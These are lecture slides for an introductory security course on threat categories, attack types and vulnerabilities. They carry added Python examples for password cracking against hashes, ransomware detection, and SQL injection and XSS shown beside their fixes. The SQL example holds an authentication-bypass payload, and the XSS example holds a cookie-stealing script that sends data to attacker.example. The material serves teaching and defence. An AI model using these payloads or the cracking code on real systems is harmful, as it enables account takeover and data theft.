CIS2103-Week03-4-CH2_Identify Threats and Vulnerabilities-2.pdf



CIS 2103 - Principles of Information Assurance, Security and Privacy
Chapter 2: Identify Threats and Vulnerabilities (CLO2)

Credits and Revision Control
Change description: existing material is revised and updated
Change level: minor

Version | Author | Effective Date | Change Description | DRC No
1.0 | Unknown | NA | Define the first version | 001
1.1 | Dr. Samer Aoudi | Fall 2021 (August 2021) | Revise the first version | 002
1.2 | Dr. Abdel-Karim Al-Tamimi | Spring 2022 | Add examples/animations | 003
2.0 | Dr. Omar Taher | Fall 2022 (August 2022) | Revise and update | 004
3.0 | Dr. Waleed Al-Sit | Fall 2024 (August 2024) | Revise and update | 005

Delivery Outline
W1-2: CH1 - Introduce the Foundation of Information Security (CLO1)
W3-4: CH2 - Identify Threats and Vulnerabilities (CLO2)
W5-6: CH3 - Apply Cryptography Basics (CLO3)
W7: CH4 - Discuss Identity and Access Management (CLO3)
W8: CH5 - Identify Software Security Fundamentals (CLO3)
W9: CH6 - Discuss Host and Network Security (CLO3)
W10-11: CH7 - Apply Basics of Information Security Risk Management (CLO4)
W12: CH8 - Apply Basics of Operational Security and Contingency Planning (CLO4)
W13: CH9 - Discuss Legal, Ethical and Privacy related Aspects (CLO1)
W14-15: Project: Research and Poster Competition: 30% (CLO All)

Chapter 2: Identify Threats and Vulnerabilities (CLO2)

Chapter Learning Objectives
Upon completing this chapter, students will be able to:
- Identify categories of threats.
- Discuss various types of attacks.
- Discuss different types of vulnerabilities.
- Describe basic security controls and mechanisms.
Activities: The impact of data breaches

Video: Cyber Security - Top 10 Threats (5 minutes)
https://www.youtube.com/watch?v=dVW1FNWSaTg (duration 3:00)
Video: The Life of a Cyberthreat (5 minutes)
https://www.youtube.com/watch?v=iF8DBpyR23E (duration 3:00)

Information Security Threats and Attacks
- Threat: a potential risk to an asset's loss of value.
- Attack: an intentional or unintentional act that can damage or otherwise compromise information and the systems that support it.
- Exploit: a technique used to compromise a system.
- Vulnerability: a potential weakness in an asset or its defensive control system(s).
Management must be informed about the various threats to an organization's people, applications, data, and information systems. Overall security is improving, but the number of potential hackers is growing.

Categories of Threats to InfoSec
Threat Category | Examples
1. Compromises to intellectual property (IP) | Piracy (software, music, movies, etc.)
2. Software attacks | Malware (virus, worm, Trojan horse, ransomware, etc.)
3. Deviations in quality of service (QoS) | Power outage, ISP connectivity issues, etc.
4. Espionage or trespass | Unauthorized access to premises and/or data
5. Forces of nature | Fire, floods, earthquakes, etc.
6. Human error or failure | Data entry mistakes, accidents, etc.
7. Social engineering | Extortion, blackmail, phishing, etc.
8. Sabotage or vandalism | Destruction of or damage to information assets
9. Theft | Stealing information assets
10. Technical failures (hardware or software) | Server malfunction (HW); code bug such as a buffer overflow (SW)
11. Technological obsolescence | Outdated software (e.g. Adobe Flash, Windows XP, iOS 5.0)

Compromises to Intellectual Property
- Intellectual property (IP): the creation, ownership, and control of original ideas as well as the representation of those ideas.
- IP includes trade secrets, copyrights, trademarks, and patents.
- The most common IP breaches involve software piracy.
- Two watchdog organizations investigate software abuse: the Software and Information Industry Association (SIIA) and the Business Software Alliance (BSA).
- According to the BSA, in 2018 approximately 37 percent of software installed on personal computers globally was not properly licensed.
Software Attacks
- Malicious software (malware) is used to overwhelm the processing capabilities of online systems or to gain access to protected systems via hidden means.
- Software attacks occur when an individual or a group designs and deploys software to attack a system.
- A zero-day attack exploits a vulnerability that is not yet known to the vendor or to antimalware companies, so no patch or detection signature exists for it at the time of the attack.

Deviations in Quality of Service
- An information system depends on the successful operation of many interdependent support systems.
- Internet service, communications, and power irregularities dramatically affect the availability of information and systems.
- Services are usually arranged with a service level agreement (SLA).

Espionage or Trespass (1 of 5): Competitive Intelligence
Definition: competitive intelligence (CI) involves the ethical and legal collection and analysis of information about competitors, the industry, and the business environment to inform strategic decision-making.
Methods:
- Publicly available information: CI relies on gathering information that is publicly accessible, including financial reports, press releases, industry publications, company websites, patents, and social media.
- Market analysis: analyzing market trends, customer preferences, and competitor products and services.
- Surveys and interviews: conducting surveys and interviews with customers, suppliers, and other stakeholders.
Ethical standards: practitioners of CI adhere to a code of ethics, such as the one published by Strategic and Competitive Intelligence Professionals (SCIP).

Espionage or Trespass (2 of 5): Industrial Espionage
Definition: industrial espionage, also known as corporate or economic espionage, involves the illegal and unethical acquisition of confidential information from a competitor or business.
Methods:
- Hacking: unauthorized access to competitors' computer systems to steal proprietary information.
- Theft: physically stealing documents, prototypes, or other property.
- Spying: using covert methods, such as planting spies within a competitor's organization or using surveillance techniques.
- Deception: engaging in deceit, such as pretending to be someone else to gain access to restricted information.

Espionage or Trespass (3 of 5)
- Access of protected information by unauthorized individuals.
- Competitive intelligence techniques are legal, whereas industrial espionage techniques are not.
- Shoulder surfing can occur anywhere a person accesses confidential information.
- Acts of trespass can lead to unauthorized real or virtual actions that enable information gatherers to enter premises or systems without permission.
- Hackers use skill, guile, or fraud to bypass controls protecting others' information.

Figure: Shoulder surfing

Espionage or Trespass (4 of 5)
- Expert hacker: develops software scripts and program exploits; usually a master of many skills; will often create attack software and share it with others.
- Unskilled hackers: there are many more unskilled hackers than expert hackers; they use expertly written software to exploit a system; they do not usually fully understand the systems they hack; also known as script kiddies or packet monkeys.

Espionage or Trespass (5 of 5)
Other terms for system rule breakers:
- Cracker: "cracks" or removes software protection designed to prevent unauthorized duplication.
- Phreaker: hacks the public telephone system to make free calls or disrupt services.
Password attacks (password cracking):
- Brute force: try every possible combination of characters up to some length.
- Dictionary: try a list of likely passwords (common words, previously leaked passwords).
- Rainbow tables: look up a captured password hash in a precomputed table of hashes; this only works when the stored hashes are unsalted.
- Social engineering: trick or persuade the user into revealing the password.

Forces of Nature
- Forces of nature can present some of the most dangerous threats.
- They disrupt not only individual lives, but also the storage, transmission, and use of information.
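The password attacks listed on the last Espionage or Trespass slide (brute force, dictionary, rainbow-table lookup) as a runnable Python example. This is added here for the transcript and is not part of the course slides: the "leaked" hash list, the usernames, the wordlist and the salt are all constructed for the demo, and unsalted SHA-256 stands in for whatever fast hash a careless site might use.

```python
"""Password attacks against a leaked hash list: dictionary, brute force, precomputed lookup,
and the effect of salting. Added example for this transcript; all data below is constructed."""
import hashlib
import itertools
import string
from typing import Dict, Optional, Tuple


def sha256_hex(text: str) -> str:
    """Fast, unsalted hash: the weak storage scheme the attacks below exploit."""
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


# Constructed 'breach dump': username -> unsalted SHA-256 of the password.
LEAKED_UNSALTED: Dict[str, str] = {
    "alice": sha256_hex("letmein"),       # weak: appears in the wordlist
    "bob":   sha256_hex("ab1"),           # weak: short enough to brute-force
    "carol": sha256_hex("Summer2024!x"),  # neither: stays uncracked here
}
# Constructed wordlist (real ones hold millions of leaked passwords).
WORDLIST = ["123456", "password", "letmein", "qwerty", "welcome"]


def dictionary_attack(target_hash: str, wordlist, salt: str = "") -> Optional[str]:
    """Hash each likely password (with the salt, if known) and compare: one hash per guess."""
    for word in wordlist:
        if sha256_hex(salt + word) == target_hash:
            return word
    return None


def brute_force(target_hash: str, alphabet: str, max_len: int) -> Optional[str]:
    """Try every string over `alphabet` up to max_len; work grows as len(alphabet) ** max_len."""
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            candidate = "".join(chars)
            if sha256_hex(candidate) == target_hash:
                return candidate
    return None


def build_lookup_table(wordlist) -> Dict[str, str]:
    """hash -> password, computed once and reused against every unsalted hash
    (a rainbow table is this idea with hash chains to save space)."""
    return {sha256_hex(w): w for w in wordlist}


def crack_unsalted(leaked: Dict[str, str]) -> Dict[str, Optional[str]]:
    """Lookup table first (no hashing at attack time), then a short brute force."""
    table = build_lookup_table(WORDLIST)
    alphabet = string.ascii_lowercase + string.digits
    return {user: table.get(h) or brute_force(h, alphabet, 3) for user, h in leaked.items()}


def salted_store(password: str, salt: str) -> str:
    """Per-user salt prepended before hashing. (A fast hash is still wrong in production;
    use bcrypt, scrypt or Argon2. SHA-256 keeps this demo dependency-free.)"""
    return sha256_hex(salt + password)


def salt_vs_attacks() -> Tuple[Optional[str], Optional[str]]:
    """Same password as alice, now salted: the precomputed table misses, but a dictionary
    attack that knows the salt still succeeds. Salting stops table reuse, not weak passwords."""
    salt = "x9Qm2"  # constructed; real salts are random, e.g. os.urandom(16)
    h = salted_store("letmein", salt)
    return build_lookup_table(WORDLIST).get(h), dictionary_attack(h, WORDLIST, salt=salt)


if __name__ == "__main__":
    print(crack_unsalted(LEAKED_UNSALTED))  # alice, bob cracked; carol None
    print(salt_vs_attacks())                # (None, 'letmein')
```

The point to take from `salt_vs_attacks` is that a salt defeats the precomputed table but does nothing against a targeted dictionary attack on a weak password; the only defences against that are a slow password-hashing function and a password that is not in any wordlist.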
- Threats include fires, floods, earthquakes, lightning, landslides, tornados, hurricanes, tsunamis, electrostatic discharge (ESD), dust contamination, solar activity, civil unrest, and acts of war.
- Organizations must implement controls to limit damage and prepare contingency plans for continued operations.

Human Error or Failure (1 of 2)
- Includes acts performed without malicious intent or in ignorance.
- Causes include inexperience, improper training, and incorrect assumptions.
- Employees are among the greatest threats to an organization's data.

Human Error or Failure (2 of 2)
Employee mistakes can easily lead to:
- revelation of classified data
- entry of erroneous data
- accidental data deletion or modification
- data storage in unprotected areas
- failure to protect information
Many of these threats can be prevented with training, ongoing awareness activities, and controls.
Social engineering uses social skills to convince people to reveal access credentials or other valuable information to an attacker.

Sabotage and Vandalism
Sabotage: cyber sabotage involves deliberate actions taken to damage, disrupt, or destroy information systems, networks, or data with the intent to hinder or stop the functioning of an organization, system, or service.
Examples:
- A state-sponsored attack that disrupts a country's power grid.
- Malware designed to destroy or disable critical industrial systems (e.g. Stuxnet).
- Deleting or corrupting essential data to halt business operations.

Sabotage and Vandalism
Vandalism: cyber vandalism refers to the willful and malicious defacement, destruction, or disruption of websites, applications, or data. The intent is usually to cause damage, spread a message, or demonstrate hacking skills, without necessarily aiming for strategic disruption.
Examples:
- A hacker defaces a corporate website to display offensive messages.
- Unauthorized access to a public figure's social media account to post inappropriate content.
- Deleting or altering content on a blog or news site.
Information Extortion
- Also known as cyberextortion.
- The attacker steals information from a computer system and demands compensation for its return or nondisclosure.
- Common in credit card number theft.

Sabotage or Vandalism
- Threats can range from petty vandalism to organized sabotage.
- Website defacing can erode consumer confidence, diminishing an organization's sales, net worth, and reputation.
- The threat of hacktivist or cyberactivist operations is rising.
- Cyberterrorism/cyberwarfare: a much more sinister form of hacking.

Technical Hardware Failures or Errors
- They occur when a manufacturer distributes equipment containing a known or unknown flaw.
- They can cause the system to perform outside of expected parameters, resulting in unreliable service or lack of availability.
- Some errors are terminal, while others are intermittent.
- The 1994 Intel Pentium floating-point division (FDIV) bug is a notable example.
- Mean time between failures (MTBF) and annualized failure rate (AFR) measure hardware failure rates.

Technological Obsolescence
- Antiquated/outdated infrastructure can lead to unreliable and untrustworthy systems.
- Proper managerial planning should prevent technology obsolescence.

Theft
- The illegal taking of another's physical, electronic, or intellectual property.
- Physical theft is controlled relatively easily.
- Electronic theft is a more complex problem; the evidence of the crime is not readily apparent.

Types of Attacks

Understanding Security Attacks
There are different types of attacks that try to exploit existing vulnerabilities in our systems.
Attacks can be categorized by how they are carried out:
- using software (e.g. a virus)
- physically (e.g. breaking into an office and stealing a laptop)
- socially (e.g. tricking someone into giving you their password)
Attacks can also be categorized by what they target:
- technological assets (e.g. hacking a server, laptop, router, etc.)
- physical assets (e.g. stealing or damaging a laptop)
- people (e.g. social engineering)
Common attacks:
1. Malware attacks
2. DoS attacks (DDoS; mail bombing)
3. Network traffic attacks (sniffing; spoofing; MiTM)
4. Social engineering (phishing; smishing)
5. Pharming
6. Misinformation and disinformation (scams and hoaxes)
7. Spam email

Malware
- Malware = malicious software; in other words, code (scripts, programs) written with the intent to modify, destroy, steal, or deny access to computer systems or information.
- Malware is a category that includes viruses, worms, Trojan horses, ransomware, active Web scripts, and other types of code.
- Different types of malware are categorized based on how they work and what they target.

The Most Dangerous Malware Attacks to Date (1 of 2)
Malware | Type | Year | Estimated Number of Systems Infected | Estimated Financial Damage
CIH, a.k.a. Chernobyl | Memory-resident virus | 1998 | Unknown | $250 million
Melissa | Macro virus | 1999 | Unknown | $300 million to $600 million
ILOVEYOU | Virus | 2000 | 10% of Internet | $5.5 billion
Klez (and variants) | Virus | 2001 | 7.2% of Internet | $19.8 billion
Code Red (and CR II) | Worm | 2001 | 400,000 servers | $2.6 billion
Nimda | Multivector worm | 2001 | Unknown | Unknown
Sobig F | Worm | 2003 | 1 million | $3 billion
SQL Slammer, a.k.a. Sapphire | Worm | 2003 | 75,000 | $950 million to $1.2 billion

Categories of Malware
Malware Category | Description
1. Virus | Attaches itself to a file or program. Needs a host and human interaction to replicate (e.g. a click).
2. Worm | Replicates and spreads without a host and without human interaction.
3. Trojan horse | Disguises itself as a useful program but includes malware.
4. Polymorphic malware | Malware (virus, worm, etc.) that constantly changes its identifiable features; difficult to detect.
5. Backdoor | Malware that allows bypassing normal authentication.
6. Rootkit | Malware that attempts to conceal the existence of malware on the victim host (to avoid detection).
7. Ransomware | Malware that holds computers or files for ransom and blackmails the victim into paying money.
8. Spyware | Malware that collects information from the infected computer and sends it to the attacker.
9. Adware | Displays advertising pop-ups and banners.
10. Logic bomb | Special malware that activates only when certain conditions are met (e.g. on the 9th of July).
11. Botnet | A collection of inter-connected devices infected with malware and controlled by an attacker.

Trojan vs Virus vs Worm
Trojan | Virus | Worm
Cannot replicate itself | Can replicate itself (locally on the system) | Can replicate itself (propagates through the network)
Uses social engineering to spread | Attaches itself to existing programs | No need to attach itself to other programs (self-contained)
Malware that disguises itself as good software | |

Class Activity - Virus, Worm, and Trojan (10 minutes)
- Research the three types of malware and write a paragraph differentiating between them.
- How can people protect against malware?

Ransomware
- Ransomware is a malware attack on the host system that denies access to the user and then offers to provide a key to allow access back to the user's system and data for a fee.
- There are two types of ransomware: lockscreen and encryption.
- Common phishing mechanisms to get a user to download ransomware include pop-ups indicating that illegal information or malware was detected on the user's system, threatening to notify law enforcement, or offering to delete the offending material if the user clicks a link or button.
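The encryption type of ransomware described on the slide leaves a signature a defender can look for: one process rewriting many user files in a short burst, each new file looking like random bytes, often followed by a ransom note. The Python below is an added example of that detection logic, written for this transcript and not part of the course material. The process names, paths and file-write events are constructed, and a uniform 256-byte pattern stands in for encrypted output.

```python
"""Heuristic detection of encryption-type ransomware from file-write events.
Added example for this transcript; process names, paths and events are constructed."""
import math
from collections import defaultdict
from typing import Dict, List, NamedTuple


class WriteEvent(NamedTuple):
    ts: float       # seconds since start of the trace
    process: str
    path: str
    data: bytes     # content written (a real sensor would sample the first bytes)


# Constructed payloads: readable text vs. a stand-in for ciphertext
# (every byte value equally frequent, so Shannon entropy is exactly 8.0 bits/byte).
PLAINTEXT = b"Quarterly sales report: revenue up 4% year on year. " * 20
CIPHERTEXT = bytes(range(256)) * 4

# Constructed trace: a word processor, an archiver, and a process that rewrites six
# documents in a few seconds and then drops a ransom note.
EVENTS: List[WriteEvent] = [
    WriteEvent(0.0, "winword.exe", "/home/a/Documents/report.docx", PLAINTEXT),
    WriteEvent(45.0, "winword.exe", "/home/a/Documents/budget.docx", PLAINTEXT),
    WriteEvent(50.0, "7z.exe", "/home/a/backup.7z", CIPHERTEXT),  # compressed data is random-looking too
    *[WriteEvent(100.0 + i, "updatesvc.exe", f"/home/a/Documents/file{i}.docx.locked", CIPHERTEXT)
      for i in range(6)],
    WriteEvent(108.0, "updatesvc.exe", "/home/a/Documents/README_DECRYPT.txt",
               b"Your files are encrypted. Contact ... to buy the key."),
]

RANSOM_NOTE_HINTS = ("decrypt", "recover", "restore", "ransom")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: roughly 4 to 5 for English text, close to 8 for encrypted or compressed data."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def detect_ransomware(events: List[WriteEvent], window: float = 10.0, min_files: int = 5,
                      entropy_threshold: float = 7.0) -> List[Dict]:
    """Alert on any process that writes >= min_files distinct high-entropy files within `window`
    seconds. A single high-entropy write (an archiver, a downloaded video) is not enough, which
    is what keeps 7z.exe below the threshold here; a ransom note only raises confidence."""
    by_process: Dict[str, List[WriteEvent]] = defaultdict(list)
    for e in sorted(events, key=lambda e: e.ts):
        by_process[e.process].append(e)

    alerts = []
    for process, evs in by_process.items():
        high = [e for e in evs if shannon_entropy(e.data) >= entropy_threshold]
        burst = 0
        for i, start in enumerate(high):  # sliding window over the high-entropy writes
            in_window = [e for e in high[i:] if e.ts - start.ts <= window]
            burst = max(burst, len({e.path for e in in_window}))
        note = any(hint in e.path.lower() for e in evs for hint in RANSOM_NOTE_HINTS)
        if burst >= min_files:
            alerts.append({"process": process, "files_in_window": burst, "ransom_note": note})
    return alerts


if __name__ == "__main__":
    for alert in detect_ransomware(EVENTS):
        print(alert)  # only updatesvc.exe: 6 files in window, ransom_note True
```

The thresholds are the tuning knobs: `min_files` and `window` trade detection delay against false positives from legitimate bulk writers such as backup or compression tools, and a real deployment would also watch for mass renames to a new extension and for deleted shadow copies.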
Figure: Ransomware notification screen

Denial of Service (DoS) Attacks
- Denial of service (DoS) attacks target the availability of information or computer systems.
- The attacker sends a large number of requests to a target system, which becomes busy and unable to handle legitimate service requests.
- The target system may crash or become slow.
- Distributed denial of service (DDoS) is a type of DoS where a coordinated stream of requests is launched against a target from many locations simultaneously.
- Mail bombing is a type of DoS where the attacker routes large quantities of e-mail to a target.
- DDoS attacks are often carried out via botnets.

Figure: DoS (one attacker, one target) vs. DDoS (many attackers, one target)

Network Traffic Attacks
- In computer networks, information travels via wired or wireless media from one place to another.
- Attackers can target network traffic (i.e. packets of data) to gain access or steal information.
Common attacks:
- Packet sniffing is the process of monitoring and collecting data packets that pass through a computer network.
- Spoofing is the process of disguising a communication from the attacker as being from a known, trusted source (e.g. ARP spoofing).
- MiTM (man-in-the-middle) attack: the attacker positions themselves in the middle of the communication between two nodes (e.g. customer and bank), monitors network packets, modifies them, and inserts them back into the network, fooling one or both parties into thinking they are talking to the other.

Figure: IP spoofing. The original packet has IP source 192.168.24.12 (the attacker) and IP destination 10.0.0.75 (the target). The attacker rewrites the source address to 10.0.0.80, an address the firewall trusts, so the firewall mistakes the spoofed packet for legitimate traffic and allows it through to the target.

Figure: MiTM attack. The attacker diverts traffic and tricks both users: User A thinks they are communicating with User B, and User B thinks they are communicating with User A.

Social Engineering Attacks
- What is the easiest way to get someone's password?
- Social engineering is the art of manipulating people into providing information or a service they otherwise would never have given.
- Using social skills, an attacker tries to convince people to reveal access credentials (passwords) or other valuable information (credit card number, UAE ID, etc.).
Why do people fall for trickery?
- Lack of awareness
- Human nature to trust
- Fear (can lead to information extortion and blackmail)
- Greed
- Etc.
Common attacks:
- Phishing (trickery via email)
- Smishing (trickery via SMS)
Countermeasures: awareness is the best countermeasure.

Phishing
- A fake email is sent to thousands of people with links to fake websites or malicious code.
- When victims click the links, they either download the malware and their computers get infected, or they go to a fake website where they reveal confidential information.
Countermeasures:
- Awareness
- When not sure, always type the address of the website (e.g. your bank) yourself instead of following the link.

Figure: Phishing example

Pharming
- Pharming is the process of redirecting legitimate Web traffic (e.g. browser requests) to an illegitimate site for the purpose of obtaining private information.
- This is a technical attack that requires changing the hosts file on a victim's computer or exploiting vulnerable DNS servers.
Countermeasures (as a user):
- Always check the URL (address) of the website you visit.
- Verify the identity of the website through its digital certificate.

Figure: Pharming. Legitimate resolution: www.google.com -> 8.8.8.8. Poisoned resolution: www.google.com -> 6.6.6.6, the address of www.evil.com.

Other Attacks
- Spam is unsolicited commercial e-mail that we receive on a daily basis from sources we don't know.
- Spam is more a nuisance than an attack, though it is emerging as a vector for some attacks.
- Misinformation is false, inaccurate, or misleading information, regardless of intent.
- Disinformation is knowingly spreading misinformation.
- Misinformation and disinformation allow for scams and hoaxes.
Countermeasures:
- Awareness: don't believe everything you read and don't help spread hoaxes.
- Fact-check information by using reliable sources.

Class Activity - UAE Law on Misinformation (10 minutes)
- Visit the UAE MOJ Laws & Regulations website: https://elaws.moj.gov.ae
- Search for and find Federal Decree Law No. 5 of 2012.
- Find Article 29.
- Read and discuss.

Class Activity - Employee Threats (10 minutes)
- Employees are considered among the greatest threats to an organization's information security. Do you agree with this statement?
- What can organizations do to protect against employees as a threat to information security?

Types of Vulnerabilities

Types of Vulnerabilities (1 of 3)
- Vulnerabilities are weaknesses or flaws in a system that can be exploited by attackers to gain unauthorized access or cause damage.
- Knowing about vulnerabilities helps in protecting systems from potential threats.
Software vulnerabilities: flaws, bugs, or weaknesses in software code.
Examples:
- Buffer overflow: a program writes more data to a buffer than it can hold, leading to crashes or arbitrary code execution.
- SQL injection: attackers inject malicious SQL code into a database query to manipulate or access data.
- Cross-site scripting (XSS): attackers inject malicious scripts into web pages viewed by other users.

Types of Vulnerabilities (2 of 3)
Hardware vulnerabilities: weaknesses in the physical components of a computer system.
Examples:
- Firmware exploits: bugs in firmware that can be exploited for control over hardware.
- Side-channel attacks: gaining information from the physical implementation of a computer system (e.g. the Meltdown and Spectre attacks).
- Device theft: physical theft of devices leading to data breaches.
Network vulnerabilities: weaknesses in the design, implementation, or configuration of a network.
Examples:
- Man-in-the-middle (MITM) attacks: attackers intercept and potentially alter communication between two parties.
- Denial of service (DoS) attacks: overloading a network with traffic to disrupt services.
- Weak encryption protocols: using outdated or weak encryption can expose data to interception.

Types of Vulnerabilities (3 of 3)
Human vulnerabilities: weaknesses arising from human behavior and actions.
Examples:
- Social engineering: manipulating individuals into divulging confidential information (e.g. phishing attacks).
- Weak passwords: using easily guessable passwords that can be cracked.
- Lack of awareness: employees not aware of security policies or best practices.

Security Controls and Mechanisms: Control Types
A security control is a safeguard employed within an enterprise to protect the confidentiality, integrity, and availability (CIA) of information. Control types include:
- Administrative: covers personnel security, risk management, training, permissions, etc.
- Physical: limits a person's physical access to assets or facilities, using locks, doors, fences, etc. Example: an infrared monitoring system can detect the presence of an intruder.
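Of the three software vulnerabilities listed above, SQL injection and XSS can be shown end to end in a few lines, and the fix for each is a technical (logical) control of the kind the next control type describes. The Python below is an added example written for this transcript, not part of the course slides: it uses an in-memory SQLite table with constructed user rows and constructed attack payloads. Buffer overflows need a memory-unsafe language and are not shown here.

```python
"""SQL injection and XSS: vulnerable code beside the fix. Added example for this transcript;
the users table, its rows and the payloads are constructed."""
import html
import sqlite3
from typing import List, Tuple


def setup_db() -> sqlite3.Connection:
    """In-memory SQLite with two constructed accounts (passwords stored as placeholder hashes)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "hash-of-alices-password", "admin"),
        ("bob", "hash-of-bobs-password", "user"),
    ])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password_hash: str) -> List[Tuple]:
    """Builds the query by string formatting, so user input becomes part of the SQL grammar.
    With username = "alice' --" the rest of the WHERE clause is commented out."""
    query = (f"SELECT username, role FROM users "
             f"WHERE username = '{username}' AND password_hash = '{password_hash}'")
    return conn.execute(query).fetchall()


def login_parameterized(conn: sqlite3.Connection, username: str, password_hash: str) -> List[Tuple]:
    """Placeholders: the driver binds values after the statement is parsed, so a quote or '--'
    in the input is just data compared against the column."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password_hash = ?",
        (username, password_hash),
    ).fetchall()


def render_comment_vulnerable(comment: str) -> str:
    """Reflects user text straight into HTML: a <script> in the comment runs in every viewer's browser."""
    return f"<p>{comment}</p>"


def render_comment_escaped(comment: str) -> str:
    """html.escape turns <, >, &, and quotes into entities, so the browser shows the text instead of running it."""
    return f"<p>{html.escape(comment)}</p>"


def demo() -> dict:
    conn = setup_db()
    sqli_payload = "alice' --"  # constructed: closes the string, comments out the password check
    xss_payload = "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"  # constructed
    return {
        "vulnerable_login": login_vulnerable(conn, sqli_payload, "wrong"),        # [('alice', 'admin')]
        "parameterized_login": login_parameterized(conn, sqli_payload, "wrong"),  # []
        "vulnerable_html": render_comment_vulnerable(xss_payload),
        "escaped_html": render_comment_escaped(xss_payload),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Both fixes are the same idea applied to different interpreters: keep data and code separate by handing the untrusted string to the parser (the database driver, the HTML encoder) as a value rather than splicing it into the program text. Escaping for HTML is context-dependent; `html.escape` is right for element content and attribute values but not for text placed inside a `<script>` block or a URL.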
- Technical: also known as logical controls; implemented in computing environments such as operating systems, applications, databases, network devices, etc.
- Technical and physical controls are generally preferred where they can be applied, because administrative controls depend on people to follow and enforce them.

Figure: layered controls between the user and the asset: administrative, physical, technical.

Summary
- Information security performs four important functions to ensure that information assets remain safe and useful: protecting the organization's ability to function; enabling the safe operation of applications; protecting data; safeguarding technology assets.
- Threats to information security come in various types and forms. Threats are not always attacks.
- There are various types of attacks; some are technical, some are physical, and others are social.

CIS 2103 | 800 MyHCT (800 69428) | www.hct.ac.ae
